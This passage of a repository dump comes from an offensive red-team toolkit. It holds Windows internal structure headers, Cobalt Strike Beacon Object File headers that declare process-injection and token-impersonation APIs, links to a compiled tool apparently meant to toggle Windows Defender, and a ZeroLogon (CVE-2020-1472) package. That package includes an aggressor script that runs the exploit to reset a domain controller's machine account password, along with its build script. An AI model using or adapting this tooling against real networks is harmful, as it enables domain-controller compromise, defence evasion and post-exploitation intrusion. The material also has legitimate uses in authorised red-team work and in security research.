30 | DECLSPEC_IMPORT WINBOOL WINAPI PSAPI$EnumProcessModules(HANDLE hProcess, HMODULE *lphModule, DWORD cb, LPDWORD lpcbNeeded); 31 | DECLSPEC_IMPORT DWORD WINAPI PSAPI$GetModuleFileNameExA(HANDLE hProcess, HMODULE hModule, LPSTR lpFilename, DWORD nSize); 32 | 33 | #define InitializeObjectAttributes( i, o, a, r, s ) { \ 34 | (i)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 35 | (i)->RootDirectory = r; \ 36 | (i)->Attributes = a; \ 37 | (i)->ObjectName = o; \ 38 | (i)->SecurityDescriptor = s; \ 39 | (i)->SecurityQualityOfService = NULL; \ 40 | } 41 | 42 | typedef enum _KEY_VALUE_INFORMATION_CLASS { 43 | KeyValueBasicInformation, 44 | KeyValueFullInformation, 45 | KeyValuePartialInformation, 46 | KeyValueFullInformationAlign64, 47 | KeyValuePartialInformationAlign64, 48 | KeyValueLayerInformation, 49 | MaxKeyValueInfoClass 50 | } KEY_VALUE_INFORMATION_CLASS; 51 | 52 | typedef enum _SYSTEM_INFORMATION_CLASS { 53 | SystemBasicInformation, 54 | SystemProcessorInformation, 55 | SystemPerformanceInformation, 56 | SystemTimeOfDayInformation, 57 | SystemPathInformation, 58 | SystemProcessInformation, 59 | SystemCallCountInformation, 60 | SystemDeviceInformation, 61 | SystemProcessorPerformanceInformation, 62 | SystemFlagsInformation, 63 | SystemCallTimeInformation, 64 | SystemModuleInformation, 65 | SystemProcessIdInformation = 88 66 | } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; 67 | 68 | typedef LONG KPRIORITY; 69 | 70 | typedef struct _UNICODE_STRING { 71 | USHORT Length; 72 | USHORT MaximumLength; 73 | PWSTR Buffer; 74 | } UNICODE_STRING, *PUNICODE_STRING; 75 | 76 | typedef const UNICODE_STRING* PCUNICODE_STRING; 77 | 78 | typedef struct _SYSTEM_PROCESSES { 79 | ULONG NextEntryDelta; 80 | ULONG ThreadCount; 81 | ULONG Reserved1[6]; 82 | LARGE_INTEGER CreateTime; 83 | LARGE_INTEGER UserTime; 84 | LARGE_INTEGER KernelTime; 85 | UNICODE_STRING ProcessName; 86 | KPRIORITY BasePriority; 87 | HANDLE ProcessId; 88 | HANDLE InheritedFromProcessId; 89 | } 
SYSTEM_PROCESSES, *PSYSTEM_PROCESSES; 90 | 91 | typedef struct _OBJECT_ATTRIBUTES { 92 | ULONG Length; 93 | HANDLE RootDirectory; 94 | PUNICODE_STRING ObjectName; 95 | ULONG Attributes; 96 | PVOID SecurityDescriptor; 97 | PVOID SecurityQualityOfService; 98 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 99 | 100 | typedef struct _CLIENT_ID { 101 | HANDLE UniqueProcess; 102 | HANDLE UniqueThread; 103 | } CLIENT_ID, *PCLIENT_ID; 104 | 105 | typedef struct _IO_STATUS_BLOCK 106 | { 107 | union 108 | { 109 | LONG Status; 110 | PVOID Pointer; 111 | }; 112 | ULONG Information; 113 | } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; 114 | 115 | typedef struct _PEB_LDR_DATA { 116 | ULONG Length; 117 | BOOLEAN Initialized; 118 | HANDLE SsHandle; 119 | LIST_ENTRY InLoadOrderModuleList; 120 | LIST_ENTRY InMemoryOrderModuleList; 121 | LIST_ENTRY InInitializationOrderModuleList; 122 | PVOID EntryInProgress; 123 | BOOLEAN ShutdownInProgress; 124 | HANDLE ShutdownThreadId; 125 | } PEB_LDR_DATA, *PPEB_LDR_DATA; 126 | 127 | typedef struct _RTL_USER_PROCESS_PARAMETERS { 128 | BYTE Reserved1[16]; 129 | PVOID Reserved2[10]; 130 | UNICODE_STRING ImagePathName; 131 | UNICODE_STRING CommandLine; 132 | } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; 133 | 134 | typedef struct _API_SET_NAMESPACE { 135 | ULONG Version; 136 | ULONG Size; 137 | ULONG Flags; 138 | ULONG Count; 139 | ULONG EntryOffset; 140 | ULONG HashOffset; 141 | ULONG HashFactor; 142 | } API_SET_NAMESPACE, *PAPI_SET_NAMESPACE; 143 | 144 | // Partial PEB 145 | typedef struct _PEB { 146 | BOOLEAN InheritedAddressSpace; 147 | BOOLEAN ReadImageFileExecOptions; 148 | BOOLEAN BeingDebugged; 149 | union 150 | { 151 | BOOLEAN BitField; 152 | struct 153 | { 154 | BOOLEAN ImageUsesLargePages : 1; 155 | BOOLEAN IsProtectedProcess : 1; 156 | BOOLEAN IsLegacyProcess : 1; 157 | BOOLEAN IsImageDynamicallyRelocated : 1; 158 | BOOLEAN SkipPatchingUser32Forwarders : 1; 159 | BOOLEAN SpareBits : 3; 160 | }; 161 | }; 162 | HANDLE Mutant; 163 | 164 
| PVOID ImageBaseAddress; 165 | PPEB_LDR_DATA Ldr; 166 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; 167 | PVOID SubSystemData; 168 | PVOID ProcessHeap; 169 | PRTL_CRITICAL_SECTION FastPebLock; 170 | PVOID IFEOKey; 171 | PSLIST_HEADER AtlThunkSListPtr; 172 | union 173 | { 174 | ULONG CrossProcessFlags; 175 | struct 176 | { 177 | ULONG ProcessInJob : 1; 178 | ULONG ProcessInitializing : 1; 179 | ULONG ProcessUsingVEH : 1; 180 | ULONG ProcessUsingVCH : 1; 181 | ULONG ProcessUsingFTH : 1; 182 | ULONG ProcessPreviouslyThrottled : 1; 183 | ULONG ProcessCurrentlyThrottled : 1; 184 | ULONG ProcessImagesHotPatched : 1; 185 | ULONG ReservedBits0 : 24; 186 | }; 187 | }; 188 | union 189 | { 190 | PVOID KernelCallbackTable; 191 | PVOID UserSharedInfoPtr; 192 | }; 193 | ULONG SystemReserved; 194 | ULONG AtlThunkSListPtr32; 195 | PAPI_SET_NAMESPACE ApiSetMap; 196 | ULONG TlsExpansionCounter; 197 | PVOID TlsBitmap; 198 | ULONG TlsBitmapBits[2]; 199 | PVOID ReadOnlySharedMemoryBase; 200 | PVOID SharedData; 201 | PVOID *ReadOnlyStaticServerData; 202 | PVOID AnsiCodePageData; 203 | PVOID OemCodePageData; 204 | PVOID UnicodeCaseTableData; 205 | ULONG NumberOfProcessors; 206 | ULONG NtGlobalFlag; 207 | ULARGE_INTEGER CriticalSectionTimeout; 208 | SIZE_T HeapSegmentReserve; 209 | SIZE_T HeapSegmentCommit; 210 | SIZE_T HeapDeCommitTotalFreeThreshold; 211 | SIZE_T HeapDeCommitFreeBlockThreshold; 212 | ULONG NumberOfHeaps; 213 | ULONG MaximumNumberOfHeaps; 214 | PVOID *ProcessHeaps; 215 | PVOID GdiSharedHandleTable; 216 | PVOID ProcessStarterHelper; 217 | ULONG GdiDCAttributeList; 218 | PRTL_CRITICAL_SECTION LoaderLock; 219 | ULONG OSMajorVersion; 220 | ULONG OSMinorVersion; 221 | USHORT OSBuildNumber; 222 | } PEB, *PPEB; 223 | 224 | typedef struct _TEB { 225 | NT_TIB NtTib; 226 | PVOID EnvironmentPointer; 227 | CLIENT_ID ClientId; 228 | PVOID ActiveRpcHandle; 229 | PVOID ThreadLocalStoragePointer; 230 | PPEB ProcessEnvironmentBlock; 231 | ULONG LastErrorValue; 232 | ULONG 
CountOfOwnedCriticalSections; 233 | PVOID CsrClientThread; 234 | PVOID Win32ThreadInfo; 235 | ULONG User32Reserved[26]; 236 | ULONG UserReserved[5]; 237 | PVOID WOW32Reserved; 238 | ULONG CurrentLocale; 239 | ULONG FpSoftwareStatusRegister; 240 | } TEB, *PTEB; 241 | 242 | typedef struct _KEY_VALUE_FULL_INFORMATION { 243 | ULONG TitleIndex; 244 | ULONG Type; 245 | ULONG DataOffset; 246 | ULONG DataLength; 247 | ULONG NameLength; 248 | WCHAR Name[1]; 249 | } KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION; 250 | 251 | typedef void (WINAPI* _RtlInitUnicodeString)( 252 | PUNICODE_STRING DestinationString, 253 | PCWSTR SourceString 254 | ); 255 | 256 | typedef BOOLEAN(NTAPI *_RtlEqualUnicodeString)( 257 | PUNICODE_STRING String1, 258 | PCUNICODE_STRING String2, 259 | BOOLEAN CaseInSensitive 260 | ); 261 | 262 | typedef PULONG(NTAPI *_RtlSubAuthoritySid)( 263 | PSID Sid, 264 | ULONG SubAuthority 265 | ); 266 | 267 | typedef PUCHAR(NTAPI *_RtlSubAuthorityCountSid)( 268 | _In_ PSID Sid 269 | ); 270 | -------------------------------------------------------------------------------- /github/WdToggle/WdToggle.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/github/WdToggle/WdToggle.o -------------------------------------------------------------------------------- /github/WdToggle/WdToggle.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/github/WdToggle/WdToggle.png -------------------------------------------------------------------------------- /github/WdToggle/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with 
Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 8 | */ 9 | 10 | /* data API */ 11 | typedef struct { 12 | char * original; /* the original buffer [so we can free it] */ 13 | char * buffer; /* current pointer into our buffer */ 14 | int length; /* remaining length of data */ 15 | int size; /* total size of this buffer */ 16 | } datap; 17 | 18 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 19 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 20 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 21 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 22 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 23 | 24 | /* format API */ 25 | typedef struct { 26 | char * original; /* the original buffer [so we can free it] */ 27 | char * buffer; /* current pointer into our buffer */ 28 | int length; /* remaining length of data */ 29 | int size; /* total size of this buffer */ 30 | } formatp; 31 | 32 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 33 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 34 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 35 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 36 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 37 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 38 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 39 | 40 | /* Output Functions */ 41 | #define CALLBACK_OUTPUT 0x0 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | 46 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 47 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 48 | 49 | /* Token Functions */ 50 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 51 | DECLSPEC_IMPORT void BeaconRevertToken(); 52 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 
53 | 54 | /* Spawn+Inject Functions */ 55 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 56 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 57 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 58 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 59 | 60 | /* Utility Functions */ 61 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 62 | -------------------------------------------------------------------------------- /github/ZeroLogon-BOF/LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2020, Raphael Mudge 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /github/ZeroLogon-BOF/dist/zerologon.cna: -------------------------------------------------------------------------------- 1 | alias zerologon { 2 | local('$bid $barch $fqdn $netbios $args $safew'); 3 | ($bid, $safew, $fqdn) = @_; 4 | $netbios = split("\\.", $fqdn)[0]; 5 | 6 | # figure out the arch of this session 7 | $barch = barch($1); 8 | 9 | # read in the right BOF file 10 | $handle = openf(script_resource("zerologon. $+ $barch $+ .o")); 11 | $data = readb($handle, -1); 12 | closef($handle); 13 | 14 | # build our arguments 15 | $args = bof_pack($1, "ZZZ", $fqdn, $netbios, $netbios . '$'); 16 | 17 | # safety check. 18 | if ($safew ne "iunderstand") { 19 | berror($1, "zerologon aborted! Type help zerologon and read first."); 20 | return; 21 | } 22 | 23 | # announce what we're doing 24 | btask($1, "Reset $netbios $+ \$ machine account via CVE-2020-1472"); 25 | 26 | # execute it. 27 | beacon_inline_execute($1, $data, "go", $args); 28 | } 29 | 30 | beacon_command_register( 31 | "zerologon", 32 | "Reset DC machine account password with CVE-2020-1472", 33 | "Synopsis: zerologon [safeword] [DC.fqdn]\n\nReset the machine account password for a domain controller with the\nZerologon exploit. 
\n\nThis exploit will break the functionality of this domain controller.\n\c4Don't use in production.\o Use \c0iunderstand\o as the safe word parameter\nto acknowledge that you read this."); 34 | -------------------------------------------------------------------------------- /github/ZeroLogon-BOF/dist/zerologon.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/github/ZeroLogon-BOF/dist/zerologon.x64.o -------------------------------------------------------------------------------- /github/ZeroLogon-BOF/dist/zerologon.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/github/ZeroLogon-BOF/dist/zerologon.x86.o -------------------------------------------------------------------------------- /github/ZeroLogon-BOF/make.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | set PLAT="x86" 3 | IF "%Platform%"=="x64" set PLAT="x64" 4 | 5 | cl.exe /GS- /c src/zerologon.c /Fodist/zerologon.%PLAT%.o 6 | -------------------------------------------------------------------------------- /github/ZeroLogon-BOF/src/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 
6 | */ 7 | 8 | /* data API */ 9 | typedef struct { 10 | char * original; /* the original buffer [so we can free it] */ 11 | char * buffer; /* current pointer into our buffer */ 12 | int length; /* remaining length of data */ 13 | int size; /* total size of this buffer */ 14 | } datap; 15 | 16 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 17 | DECLSPEC_IMPORT char * BeaconDataPtr(datap * parser, int size); 18 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 19 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 20 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 21 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 22 | 23 | /* format API */ 24 | typedef struct { 25 | char * original; /* the original buffer [so we can free it] */ 26 | char * buffer; /* current pointer into our buffer */ 27 | int length; /* remaining length of data */ 28 | int size; /* total size of this buffer */ 29 | } formatp; 30 | 31 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 32 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 33 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 34 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 35 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 36 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 37 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 38 | 39 | /* Output Functions */ 40 | #define CALLBACK_OUTPUT 0x0 41 | #define CALLBACK_PENDING 0x16 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | 46 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 47 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 48 | DECLSPEC_IMPORT void BeaconErrorD(int msg, int arg); 49 | DECLSPEC_IMPORT void BeaconErrorDD(int msg, int arg, int arg2); 50 | 
DECLSPEC_IMPORT void BeaconErrorNA(int msg); 51 | DECLSPEC_IMPORT void BeaconDebug(char * fmt, ...); 52 | 53 | /* Token Functions */ 54 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 55 | DECLSPEC_IMPORT void BeaconRevertToken(); 56 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 57 | 58 | /* Spawn+Inject Functions */ 59 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 60 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 61 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 62 | 63 | /* Utility Functions */ 64 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 65 | 66 | /* Spawn and Inject */ 67 | //DECLSPEC_IMPORT void BeaconSpawnJob(int type, int wait, int offset, char * payload, int payload_length, char * argument, int argument_length, char * description, int description_length, BOOL x86, BOOL ignoreToken); 68 | //DECLSPEC_IMPORT void BeaconInject(HANDLE handle, char * shellcode, int shellcode_length, int shellcode_offset, char * arguments, int argument_length); 69 | 70 | /* Execute Programs */ 71 | //DECLSPEC_IMPORT BOOL BeaconExecute(char * command, int commandlength, STARTUPINFO * si, PROCESS_INFORMATION * pi, DWORD flags, BOOL ignoreToken); 72 | //DECLSPEC_IMPORT void BeaconExecuteCleanup(PROCESS_INFORMATION * pi); 73 | 74 | /* Job related APIs */ 75 | //DECLSPEC_IMPORT void BeaconWatchHandle(HANDLE readme, DWORD pid, DWORD type, char * description); 76 | //DECLSPEC_IMPORT void BeaconWatchPipe(char * pipe, DWORD pid, DWORD type, char * description); 77 | 78 | /* Win32 APIs */ 79 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$AllocateAndInitializeSid(PSID_IDENTIFIER_AUTHORITY pIdentifierAuthority, BYTE nSubAuthorityCount, DWORD nSubAuthority0, DWORD nSubAuthority1, DWORD nSubAuthority2, DWORD nSubAuthority3, DWORD nSubAuthority4, DWORD nSubAuthority5, DWORD nSubAuthority6, DWORD nSubAuthority7, PSID 
*pSid); 80 | DECLSPEC_IMPORT BOOL APIENTRY ADVAPI32$CheckTokenMembership(HANDLE hToken, PSID pSid, PBOOL isMember); 81 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CloseServiceHandle(SC_HANDLE hSCObject); 82 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CreateProcessWithLogonW(LPCWSTR, LPCWSTR, LPCWSTR, DWORD, LPCWSTR, LPWSTR, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFOW, LPPROCESS_INFORMATION); 83 | DECLSPEC_IMPORT BOOL APIENTRY ADVAPI32$CreateRestrictedToken(HANDLE, DWORD, DWORD, PSID_AND_ATTRIBUTES, DWORD, PLUID_AND_ATTRIBUTES, DWORD, PSID_AND_ATTRIBUTES, PHANDLE); 84 | DECLSPEC_IMPORT SC_HANDLE WINAPI ADVAPI32$CreateServiceA(SC_HANDLE hSCManager, LPCSTR lpServiceName, LPCSTR lpDisplayName, DWORD dwDesiredAccess, DWORD dwServiceType, DWORD dwStartType, DWORD dwErrorControl, LPCSTR lpBinaryPathName, LPCSTR lpLoadOrderGroup, LPDWORD lpdwTagId, LPCSTR lpDependencies, LPCSTR lpServiceStartName, LPCSTR lpPassword); 85 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$DeleteService(SC_HANDLE hService); 86 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$DuplicateTokenEx(HANDLE, DWORD, LPSECURITY_ATTRIBUTES, SECURITY_IMPERSONATION_LEVEL, TOKEN_TYPE, PHANDLE); 87 | DECLSPEC_IMPORT PVOID WINAPI ADVAPI32$FreeSid(PSID pSid); 88 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetTokenInformation(HANDLE, TOKEN_INFORMATION_CLASS, LPVOID, DWORD, PDWORD); 89 | DECLSPEC_IMPORT PDWORD WINAPI ADVAPI32$GetSidSubAuthority(PSID, DWORD); 90 | DECLSPEC_IMPORT PUCHAR WINAPI ADVAPI32$GetSidSubAuthorityCount(PSID); 91 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$ImpersonateLoggedOnUser(HANDLE); 92 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$LookupAccountSidA(LPCSTR, PSID, LPSTR, LPDWORD, LPSTR, LPDWORD, PSID_NAME_USE); 93 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$OpenProcessToken(HANDLE, DWORD, PHANDLE); 94 | DECLSPEC_IMPORT SC_HANDLE WINAPI ADVAPI32$OpenSCManagerA(LPCSTR lpMachineName, LPCSTR lpDatabaseName, DWORD dwDesiredAccess); 95 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$QueryServiceStatus(SC_HANDLE hService, LPSERVICE_STATUS lpServiceStatus); 96 
| DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegEnumKeyA(HKEY hKey, DWORD dwIndex, LPSTR lpName, DWORD cchName); 97 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegEnumValueA(HKEY hKey, DWORD dwIndex, LPSTR lpValueName, LPDWORD lpcchValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData); 98 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegOpenCurrentUser(REGSAM samDesired, PHKEY phkResult); 99 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegOpenKeyExA(HKEY, LPCSTR, DWORD, REGSAM, PHKEY); 100 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegQueryValueExA(HKEY, LPCSTR, LPDWORD, LPDWORD, LPBYTE, LPDWORD); 101 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegCloseKey(HKEY); 102 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$RevertToSelf(); 103 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$SetTokenInformation(HANDLE, TOKEN_INFORMATION_CLASS, LPVOID, DWORD); 104 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$StartServiceA(SC_HANDLE hService, DWORD dwNumServiceArgs, LPCSTR *lpServiceArgVectors); 105 | 106 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CloseHandle(HANDLE); 107 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); 108 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateRemoteThread(HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId); 109 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateToolhelp32Snapshot(DWORD, DWORD); 110 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$DuplicateHandle(HANDLE, HANDLE, HANDLE, LPHANDLE, DWORD, BOOL, DWORD); 111 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetCurrentDirectoryW(DWORD, LPWSTR); 112 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$GetFileTime(HANDLE hFile, LPFILETIME lpCreationTime, LPFILETIME lpLastAccessTime, LPFILETIME lpLastWriteTime); 113 | 
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetModuleFileNameA(HMODULE, LPSTR, DWORD); 114 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetCurrentProcess(); 115 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetCurrentProcessId(); 116 | DECLSPEC_IMPORT UINT WINAPI KERNEL32$GetSystemWindowsDirectoryA(LPSTR, UINT); 117 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(); 118 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetProcessId(HANDLE); 119 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetTickCount(); 120 | DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalAlloc(UINT, SIZE_T); 121 | DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalFree(HLOCAL); 122 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD); 123 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$Process32First(HANDLE, void *); 124 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$Process32Next(HANDLE, void *); 125 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ProcessIdToSessionId(DWORD, DWORD *); 126 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesRead); 127 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$SetFileTime(HANDLE hFile, CONST FILETIME *lpCreationTime, CONST FILETIME *lpLastAccessTime, CONST FILETIME *lpLastWriteTime); 128 | DECLSPEC_IMPORT VOID WINAPI KERNEL32$Sleep(DWORD); 129 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$TerminateProcess(HANDLE, UINT); 130 | DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$VirtualAllocEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 131 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$WaitForSingleObject(HANDLE, DWORD); 132 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$WriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesWritten); 133 | 134 | DECLSPEC_IMPORT DWORD WINAPI NETAPI32$DsGetDcNameA(LPVOID, LPVOID, LPVOID, LPVOID, ULONG, LPVOID); 135 | DECLSPEC_IMPORT DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID); 136 | 137 | typedef enum 
_OBJECT_INFORMATION_CLASS { 138 | ObjectBasicInformation, ObjectNameInformation, ObjectTypeInformation, ObjectAllTypesInformation, ObjectHandleInformation 139 | } OBJECT_INFORMATION_CLASS; 140 | 141 | DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtDuplicateObject(HANDLE, HANDLE *, HANDLE, HANDLE *, ACCESS_MASK, BOOLEAN, ULONG); 142 | DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtQueryObject(HANDLE, OBJECT_INFORMATION_CLASS, PVOID, ULONG, PULONG); 143 | DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtQuerySystemInformation(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG); 144 | DECLSPEC_IMPORT NTSTATUS WINAPI NTDLL$RtlAdjustPrivilege(ULONG Privilege, BOOL Enable, BOOL CurrentThread, PULONG pPreviousState); 145 | DECLSPEC_IMPORT BOOLEAN NTAPI NTDLL$RtlEqualUnicodeString(void *, void *, BOOLEAN); 146 | DECLSPEC_IMPORT VOID NTAPI NTDLL$RtlInitUnicodeString(PUNICODE_STRING, PCWSTR); 147 | 148 | DECLSPEC_IMPORT HRESULT 